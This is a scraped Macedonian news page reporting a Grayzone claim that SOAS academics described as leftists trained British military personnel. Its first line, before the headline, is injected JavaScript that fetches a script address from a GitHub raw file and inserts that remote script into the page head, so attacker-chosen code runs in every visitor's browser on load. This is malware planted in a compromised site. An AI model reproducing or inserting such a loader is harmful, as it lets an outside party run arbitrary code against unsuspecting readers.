;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Академици „левичари“ вршеле обуки на британската армија - Антропол
АктуелноИнтернационално

Академици „левичари“ вршеле обуки на британската армија

Според написот на Ben Norton објавен на веб порталот The Grayzone, со документите кои се појавиле од британската влада се открива дека некои академици во Англија, познати како „марксисти“, обучувале припадници на британската армија кои работат во земји како што се Авганистан, Кенија и Босна и Херцеговина.

Според гореспоменатиот напис, декласифицираните документите на британската влада покажуваат дека „политичките активисти“ како соработници на разни универзитети прават обуки и предавање за „против-востанија“ на војниците од Министерството за одбрана на Велика Британија.  

Повеќето од овие академици се од Школата за ориентални и африкански студии (SOAS) во Лондон, од кои едниот е професорот Гилберт Ачар, кој издаде книга заедно со Ноам Чомски и во исто време е соработник на списанието Jacobin. Пред околу 3 месеци, се тврдеше дека SOAS давал услуги во вид на „културолошки совети“ за Министерстсвото за одбрана за кои биле наплатувани стотици илјади фунти. Во исто време, професорот Ачар, во неколку наврати ја нападна анти-империјалистичката левица, без притоа јавно да ја открива својата работа за британската војска. 

Друг академик како „експерт за Јемен“, Хелен Лакнер, кој исто така, покрај тоа што работел за списанието Jacobin тој бил и извршен директор за сервисите на BBC Arabic и BBC Turkish.

Документите покажуваат дека Министерството за одбрана од мај 2017 година платило дури 50.000 фунти за обуката на SOAS. 

Обуките биле извршени под следните три наслови: „Блискиот исток и Северна Африка“, „Русија и Источна Европа“ и „Субсахарска Африка“. 

Како еден од обучувачите и предавач, Ачар е познат по тоа што ги поддржува интервенциите на воениот пакт НАТО за „промена на режимот“ во Либија и Сирија. Притоа, опишувајќи се себеси како „анти-милитарист“, Ачар негира дека е поддржувач на империјалистичките интервенции, тврдејќи дека тој развил „антиколонијален“ пристап во својата работа.